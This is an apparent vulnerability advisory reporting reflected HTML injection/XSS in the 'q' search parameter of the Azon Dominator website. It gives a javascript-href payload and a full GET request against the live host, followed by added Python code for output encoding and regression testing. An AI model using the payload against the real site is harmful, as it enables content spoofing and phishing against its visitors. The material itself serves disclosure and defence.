## https://sploitus.com/exploit?id=PACKETSTORM:189878
Hi There,
    
    Azon Dominator is vulnerable to an HTML Injection vulnerability in its
    search functionality. The issue arises due to insufficient input validation
    in the q parameter, allowing an attacker to inject arbitrary HTML elements.
    This could lead to potential security risks such as content manipulation or
    phishing attacks.
    
    Source URL: https://azon-dominator.webister.net/
    Source Name: Seyfullah Kılıç
    Software URL: https://azon-dominator.webister.net/
    
    *Proof of Concept (PoC):*
    Vulnerable Endpoint:
    URL: https://azon-dominator.webister.net/searchurl?q=
    Method: GET
    Parameter Affected: q
    Vulnerability Type: Reflected XSS / HTML Injection
    
    *Payload Example:*
    <a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>
    
    *Request Example:*
    GET /search?q=%3Ca%20href=%22javas\x00cript:javascript:alert(1)%22%20id=%22fuzzelement1%22%3Etest%3C/a%3E HTTP/2
    Host: azon-dominator.webister.net
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    
    This vulnerability allows an attacker to inject arbitrary HTML content into
    the search query, potentially leading to security risks such as content
    spoofing or malicious script injection.
    
    Regards.
    
    -- 
    
    *Seyfullah KILIÇ*
    
    *CEO - Founder*
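
The fix for a reflected `q` parameter is context-aware output encoding, and it can be regression-tested by parsing the rendered page and checking that the query adds no elements. The following is an added example, not part of the original advisory and not the vendor's code; the template and the `render_*` and `injected_tags` names are hypothetical stand-ins for the real search handler.

```python
import html
from html.parser import HTMLParser

# Payload string quoted in the advisory, kept as the literal characters reported.
PAYLOAD = r'<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>'

# Constructed page template standing in for the search results view (assumption).
TEMPLATE = '<html><body><h1>Results for: {q}</h1><ul id="results"></ul></body></html>'


def render_vulnerable(q: str) -> str:
    """Reflects q into the page without encoding (the behaviour the advisory describes)."""
    return TEMPLATE.format(q=q)


def render_hardened(q: str) -> str:
    """Same page, with q HTML-encoded so the browser treats it as text."""
    return TEMPLATE.format(q=html.escape(q, quote=True))


class _Collector(HTMLParser):
    """Records every start tag and every text node the parser sees."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags, self.text = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

    def handle_data(self, data):
        self.text.append(data)


def _parse(page: str) -> _Collector:
    collector = _Collector()
    collector.feed(page)
    collector.close()
    return collector


def injected_tags(render, q: str):
    """Start tags that appear when q is reflected but not for a benign query."""
    baseline = _parse(render("benign")).tags
    return [t for t in _parse(render(q)).tags if t not in baseline]


def reflected_text(render, q: str) -> str:
    """Visible text of the page, as the parser decodes it."""
    return "".join(_parse(render(q)).text)
```

Run `injected_tags` against every template that echoes user input; a non-empty result means the value reached the page as markup rather than text.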